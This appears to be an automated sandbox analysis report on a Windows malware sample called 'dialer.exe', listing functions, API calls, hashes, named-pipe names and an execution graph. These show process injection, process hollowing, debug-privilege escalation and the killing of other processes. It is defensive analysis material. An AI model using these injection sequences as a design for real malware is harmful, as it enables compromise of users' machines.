                                                                                • Snapshot File: hcaresult_41_2_1160cbb0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: ierarchy Descriptor'$riptor at (
                                                                                • API String ID: 592178966-758928094
                                                                                • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction ID: db845e03e9a386c89f3d1261f79441acbf1b086655db199e5898bcfa31636649
                                                                                • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction Fuzzy Hash: 79E08671640F4890DF158F22E8802D833A4DB6CB64B889162AA5C06355FB78D1EDD300
                                                                                Function 000001160CBB73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337600267.000001160CBB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbb0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: Locator'$riptor at (
                                                                                • API String ID: 592178966-4215709766
                                                                                • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction ID: 41420dddbfc665b55ee0428c0858932803be09d5a0ccdb2c0be956dfd0c19c92
                                                                                • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction Fuzzy Hash: EDE08671600F4880DF158F21D8801D87364E76CB54F889162DA4C06355EB78D1E9D300
                                                                                Function 000001160CBE1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 756756679-0
                                                                                • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction ID: 8b7586b35baa1835ab82bac5126fa34ee7b6d35857c49c25950b6015e4fdc4bd
                                                                                • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction Fuzzy Hash: 06118235601F4485EA08DB6AE4042E973A1F78DFC0F1851A4EF4D9776AEF3AD442E300
                                                                                Function 000001160CBE1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction ID: d9000aab30809e0692e031e89ba9a180ccdffd9970db1d2a359dcaedb951b137
                                                                                • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction Fuzzy Hash: 9DE03939681F048AEB088B62D80838A37E1EB9DB06F0490249E0907355DF7E859AD750

                                                                                Execution Graph

                                                                                Execution Coverage:48.4%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:227
                                                                                Total number of Limit Nodes:23
                                                                                execution_graph 384 140002bf8 385 140002c05 384->385 387 140002c25 ConnectNamedPipe 385->387 388 140002c1a Sleep 385->388 395 140001b54 AllocateAndInitializeSid 385->395 389 140002c83 Sleep 387->389 390 140002c34 ReadFile 387->390 388->385 392 140002c8e DisconnectNamedPipe 389->392 391 140002c57 390->391 390->392 402 140002524 391->402 392->387 396 140001bb1 SetEntriesInAclW 395->396 397 140001c6f 395->397 396->397 398 140001bf5 LocalAlloc 396->398 397->385 398->397 399 140001c09 InitializeSecurityDescriptor 398->399 399->397 400 140001c19 SetSecurityDescriptorDacl 399->400 400->397 401 140001c30 CreateNamedPipeW 400->401 401->397 403 140002531 402->403 404 140002539 WriteFile 402->404 406 1400010c0 403->406 404->392 444 1400018ac OpenProcess 406->444 409 1400014ba 409->404 410 140001122 OpenProcess 410->409 411 14000113e OpenProcess 410->411 412 140001161 K32GetModuleFileNameExW 411->412 413 1400011fd NtQueryInformationProcess 411->413 414 1400011aa CloseHandle 412->414 415 14000117a PathFindFileNameW lstrlenW 412->415 416 1400014b1 CloseHandle 413->416 417 140001224 413->417 414->413 419 1400011b8 414->419 415->414 418 140001197 StrCpyW 415->418 416->409 417->416 420 140001230 OpenProcessToken 417->420 418->414 419->413 421 1400011d8 StrCmpIW 419->421 420->416 422 14000124e GetTokenInformation 420->422 421->416 421->419 423 1400012f1 422->423 424 140001276 GetLastError 422->424 425 1400012f8 CloseHandle 423->425 424->423 426 140001281 LocalAlloc 424->426 425->416 431 14000130c 425->431 426->423 427 140001297 GetTokenInformation 426->427 428 1400012df 427->428 429 1400012bf GetSidSubAuthorityCount GetSidSubAuthority 427->429 430 1400012e6 LocalFree 428->430 429->430 430->425 431->416 432 14000139b StrStrA 431->432 433 1400013c3 431->433 432->431 434 1400013c8 432->434 433->416 434->416 435 1400013f3 VirtualAllocEx 434->435 435->416 436 140001420 WriteProcessMemory 435->436 436->416 437 14000143b 436->437 449 14000211c 437->449 439 14000145b 439->416 440 140001478 WaitForSingleObject 439->440 443 140001471 CloseHandle 439->443 442 140001487 GetExitCodeThread 440->442 440->443 442->443 443->416 445 14000110e 444->445 446 1400018d8 IsWow64Process 444->446 445->409 445->410 447 1400018f8 CloseHandle 446->447 448 1400018ea 446->448 447->445 448->447 452 140001914 GetModuleHandleA 449->452 453 140001934 GetProcAddress 452->453 454 14000193d 452->454 453->454 455 140002258 458 14000226c 455->458 482 140001f2c 458->482 461 140001f2c 14 API calls 462 14000228f GetCurrentProcessId OpenProcess 461->462 463 140002321 FindResourceExA 462->463 464 1400022af OpenProcessToken 462->464 467 140002341 SizeofResource 463->467 468 140002261 ExitProcess 463->468 465 1400022c3 LookupPrivilegeValueW 464->465 466 140002318 CloseHandle 464->466 465->466 469 1400022da AdjustTokenPrivileges 465->469 466->463 467->468 470 14000235a LoadResource 467->470 469->466 471 140002312 GetLastError 469->471 470->468 472 14000236e LockResource GetCurrentProcessId 470->472 471->466 496 1400017ec GetProcessHeap HeapAlloc 472->496 474 14000238b RegCreateKeyExW 475 140002489 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 474->475 476 1400023cc ConvertStringSecurityDescriptorToSecurityDescriptorW 474->476 477 14000250f SleepEx 475->477 478 1400023f4 RegSetKeySecurity LocalFree 476->478 479 14000240e RegCreateKeyExW 476->479 477->477 478->479 480 140002448 GetCurrentProcessId RegSetValueExW RegCloseKey 479->480 481 14000247f RegCloseKey 479->481 480->481 481->475 483 140001f35 StrCpyW StrCatW GetModuleHandleW 482->483 484 1400020ff 482->484 483->484 485 140001f86 GetCurrentProcess K32GetModuleInformation 483->485 484->461 486 1400020f6 FreeLibrary 485->486 487 140001fb6 CreateFileW 485->487 486->484 487->486 488 140001feb CreateFileMappingW 487->488 489 140002014 MapViewOfFile 488->489 490 1400020ed CloseHandle 488->490 491 1400020e4 CloseHandle 489->491 492 140002037 489->492 490->486 491->490 492->491 493 140002050 lstrcmpiA 492->493 495 14000208e 492->495 493->492 494 140002090 VirtualProtect VirtualProtect 493->494 494->491 495->491 502 1400014d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 496->502 498 140001885 GetProcessHeap HeapFree 499 140001830 499->498 500 140001851 OpenProcess 499->500 500->499 501 140001867 TerminateProcess CloseHandle 500->501 501->499 503 140001565 502->503 504 14000162f GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 502->504 503->504 505 14000157a OpenProcess 503->505 507 14000161a CloseHandle 503->507 508 1400015c9 ReadProcessMemory 503->508 504->499 505->503 506 140001597 K32EnumProcessModules 505->506 506->503 506->507 507->503 508->503 509 140002b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 510 140002b8e K32EnumProcesses 509->510 511 140002beb Sleep 510->511 513 140002ba3 510->513 511->510 512 140002bdc 512->511 513->512 515 140002540 513->515 516 140002558 515->516 517 14000254d 515->517 516->513 518 1400010c0 30 API calls 517->518 518->516 519 1400021d0 520 1400021dd 519->520 521 140001b54 6 API calls 520->521 522 1400021f2 Sleep 520->522 523 1400021fd ConnectNamedPipe 520->523 521->520 522->520 524 140002241 Sleep 523->524 525 14000220c ReadFile 523->525 526 14000224c DisconnectNamedPipe 524->526 525->526 527 14000222f 525->527 526->523 527->526 528 140002560 529 140002592 528->529 530 14000273a 528->530 531 1400026c6 GetProcessHeap HeapAlloc K32EnumProcesses 529->531 532 140002598 529->532 533 140002748 530->533 534 14000297e ReadFile 530->534 535 140002633 531->535 537 140002704 531->537 538 1400025a5 532->538 539 1400026bd ExitProcess 532->539 540 140002751 533->540 541 140002974 533->541 534->535 536 1400029a8 534->536 536->535 549 1400018ac 3 API calls 536->549 537->535 551 1400010c0 30 API calls 537->551 545 1400025ae 538->545 546 140002660 RegOpenKeyExW 538->546 542 140002919 540->542 543 14000275c 540->543 544 14000175c 22 API calls 541->544 550 140001944 ReadFile 542->550 547 140002761 543->547 548 14000279d 543->548 544->535 545->535 561 1400025cb ReadFile 545->561 552 1400026a1 546->552 553 14000268d RegDeleteValueW 546->553 547->535 610 14000217c 547->610 613 140001944 548->613 554 1400029c7 549->554 556 140002928 550->556 551->537 597 1400019c4 SysAllocString SysAllocString CoInitializeEx 552->597 553->552 554->535 565 1400029db GetProcessHeap HeapAlloc 554->565 566 140002638 554->566 556->535 568 140001944 ReadFile 556->568 560 1400026a6 605 14000175c GetProcessHeap HeapAlloc 560->605 561->535 563 1400025f5 561->563 563->535 575 1400018ac 3 API calls 563->575 571 1400014d8 13 API calls 565->571 577 140002a90 4 API calls 566->577 567 1400027b4 ReadFile 567->535 572 1400027dc 567->572 573 14000293f 568->573 588 140002a14 571->588 572->535 578 1400027e9 GetProcessHeap HeapAlloc ReadFile 572->578 573->535 579 140002947 ShellExecuteW 573->579 581 140002614 575->581 577->535 583 14000290b GetProcessHeap 578->583 584 14000282d 578->584 579->535 581->535 581->566 587 140002624 581->587 582 140002a49 GetProcessHeap 585 140002a52 HeapFree 582->585 583->585 584->583 589 140002881 lstrlenW GetProcessHeap HeapAlloc 584->589 590 14000285e 584->590 585->535 591 1400010c0 30 API calls 587->591 588->582 637 1400016cc 588->637 631 140002a90 CreateFileW 589->631 590->583 617 140001c88 590->617 591->535 598 140001a11 CoInitializeSecurity 597->598 599 140001b2c SysFreeString SysFreeString 597->599 600 140001a59 CoCreateInstance 598->600 601 140001a4d 598->601 599->560 602 140001b26 CoUninitialize 600->602 603 140001a88 VariantInit 600->603 601->600 601->602 602->599 604 140001ade 603->604 604->602 606 1400014d8 13 API calls 605->606 608 14000179a 606->608 607 1400017c8 GetProcessHeap HeapFree 608->607 609 1400016cc 5 API calls 608->609 609->608 611 140001914 2 API calls 610->611 612 140002191 611->612 614 140001968 ReadFile 613->614 615 14000198b 614->615 616 1400019a5 614->616 615->614 615->616 616->535 616->567 618 140001cbb 617->618 619 140001cce CreateProcessW 618->619 621 140001e97 618->621 623 140001e62 OpenProcess 618->623 625 140001dd2 VirtualAlloc 618->625 627 140001d8c WriteProcessMemory 618->627 619->618 620 140001d2b VirtualAllocEx 619->620 620->618 622 140001d60 WriteProcessMemory 620->622 621->583 622->618 623->618 624 140001e78 TerminateProcess 623->624 624->618 625->618 626 140001df1 GetThreadContext 625->626 626->618 628 140001e09 WriteProcessMemory 626->628 627->618 628->618 629 140001e30 SetThreadContext 628->629 629->618 630 140001e4e ResumeThread 629->630 630->618 630->621 632 1400028f7 GetProcessHeap HeapFree 631->632 633 140002ada WriteFile 631->633 632->583 634 140002b1c CloseHandle 633->634 635 140002afe 633->635 634->632 635->634 636 140002b02 WriteFile 635->636 636->634 638 140001745 637->638 639 1400016eb OpenProcess 637->639 638->582 639->638 640 140001703 639->640 641 14000211c 2 API calls 640->641 642 140001723 641->642 643 14000173c CloseHandle 642->643 644 140001731 CloseHandle 642->644 643->638 644->643

                                                                                Callgraph

                                                                                Executed Functions

                                                                                Function 000000014000226C Relevance: 61.4, APIs: 27, Strings: 8, Instructions: 165registrymemorythreadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000003E.00000002.3306536859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000003E.00000002.3306381991.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306798080.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306973735.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                                                • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                                                • API String ID: 4177739653-1130149537
                                                                                • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                                • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                                                • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                                • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740
                                                                                Function 00000001400010C0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 257memorystringnativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c 24->27 28 1400014ba-1400014d6 24->28 27->28 29 140001122-140001138 OpenProcess 27->29 29->28 30 14000113e-14000115b OpenProcess 29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 32 1400011fd-14000121e NtQueryInformationProcess 30->32 33 1400011aa-1400011b6 CloseHandle 31->33 34 14000117a-140001195 PathFindFileNameW lstrlenW 31->34 35 1400014b1-1400014b4 CloseHandle 32->35 36 140001224-14000122a 32->36 33->32 38 1400011b8-1400011d3 33->38 34->33 37 140001197-1400011a7 StrCpyW 34->37 35->28 36->35 39 140001230-140001248 OpenProcessToken 36->39 37->33 40 1400011d8-1400011ea StrCmpIW 38->40 39->35 41 14000124e-140001274 GetTokenInformation 39->41 40->35 42 1400011f0-1400011fb 40->42 43 1400012f1 41->43 44 140001276-14000127f GetLastError 41->44 42->32 42->40 45 1400012f8-140001306 CloseHandle 43->45 44->43 46 140001281-140001295 LocalAlloc 44->46 45->35 47 14000130c-140001313 45->47 46->43 48 140001297-1400012bd GetTokenInformation 46->48 47->35 51 140001319-140001324 47->51 49 1400012df 48->49 50 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 48->50 52 1400012e6-1400012ef LocalFree 49->52 50->52 51->35 53 14000132a-140001334 51->53 52->45 53->35 54 14000133a-140001344 53->54 54->35 55 14000134a-14000138a call 140001ec4 * 3 54->55 55->35 62 140001390-1400013b0 call 140001ec4 StrStrA 55->62 65 1400013b2-1400013c1 62->65 66 1400013c8-1400013ed call 140001ec4 * 2 62->66 65->62 67 1400013c3 65->67 66->35 72 1400013f3-14000141a VirtualAllocEx 66->72 67->35 72->35 73 140001420-140001439 WriteProcessMemory 72->73 73->35 74 14000143b-14000145d call 14000211c 73->74 74->35 77 14000145f-140001467 74->77 77->35 78 140001469-14000146f 77->78 79 140001471-140001476 78->79 80 140001478-140001485 WaitForSingleObject 78->80 81 1400014ab CloseHandle 79->81 82 1400014a6 80->82 83 140001487-14000149b GetExitCodeThread 80->83 81->35 82->81 83->82 84 14000149d-1400014a3 83->84 84->82
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000003E.00000002.3306536859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000003E.00000002.3306381991.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306798080.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306973735.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                                                • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                                                • API String ID: 2561231171-3753927220
                                                                                • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                                • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                                                • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                                • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740
                                                                                Function 00000001400014D8 Relevance: 19.6, APIs: 13, Instructions: 130memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000003E.00000002.3306536859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000003E.00000002.3306381991.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306798080.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306973735.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                                • String ID:
                                                                                • API String ID: 4084875642-0
                                                                                • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                                • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                                                • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                                • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700
                                                                                Function 0000000140001F2C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filememorystringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000003E.00000002.3306536859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000003E.00000002.3306381991.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306798080.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306973735.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                                                • String ID: .text$C:\Windows\System32\
                                                                                • API String ID: 2721474350-832442975
                                                                                • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                                • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                                                • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                                • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700
                                                                                Function 0000000140002BF8 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000003E.00000002.3306536859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000003E.00000002.3306381991.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306798080.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306973735.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                                • String ID: M$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2203880229-3489460547
                                                                                • Opcode ID: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                                                                                • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                                                • Opcode Fuzzy Hash: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                                                                                • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700
                                                                                Function 00000001400021D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 129 1400021d0-1400021da 130 1400021dd-1400021f0 call 140001b54 129->130 133 1400021f2-1400021fb Sleep 130->133 134 1400021fd-14000220a ConnectNamedPipe 130->134 133->130 135 140002241-140002246 Sleep 134->135 136 14000220c-14000222d ReadFile 134->136 137 14000224c-140002255 DisconnectNamedPipe 135->137 136->137 138 14000222f-140002234 136->138 137->134 138->137 139 140002236-14000223f 138->139 139->137
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000003E.00000002.3306536859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000003E.00000002.3306381991.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306798080.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306973735.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                                • String ID: \\.\pipe\dialercontrol_redirect64
                                                                                • API String ID: 2071455217-3440882674
                                                                                • Opcode ID: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                                                                                • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                                                • Opcode Fuzzy Hash: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                                                                                • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700
                                                                                Function 0000000140001B54 Relevance: 9.1, APIs: 6, Instructions: 82memorypipeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000003E.00000002.3306536859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000003E.00000002.3306381991.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306798080.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306973735.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                                • String ID:
                                                                                • API String ID: 3197395349-0
                                                                                • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                                • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                                                                                • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                                • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40
                                                                                Function 0000000140002B38 Relevance: 9.1, APIs: 6, Instructions: 58memorysleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 149 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 150 140002b8e-140002ba1 K32EnumProcesses 149->150 151 140002ba3-140002bb2 150->151 152 140002beb-140002bf4 Sleep 150->152 153 140002bb4-140002bb8 151->153 154 140002bdc-140002be7 151->154 152->150 155 140002bba 153->155 156 140002bcb-140002bce call 140002540 153->156 154->152 157 140002bbe-140002bc3 155->157 160 140002bd2 156->160 158 140002bc5-140002bc9 157->158 159 140002bd6-140002bda 157->159 158->156 158->157 159->153 159->154 160->159
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000003E.00000002.3306536859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000003E.00000002.3306381991.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306798080.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306973735.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                                • String ID:
                                                                                • API String ID: 3676546796-0
                                                                                • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                                • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                                                                                • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                                • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40
                                                                                Function 00000001400017EC Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                                                • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                                                  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                                                  • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                                                  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                                                  • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                                                  • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
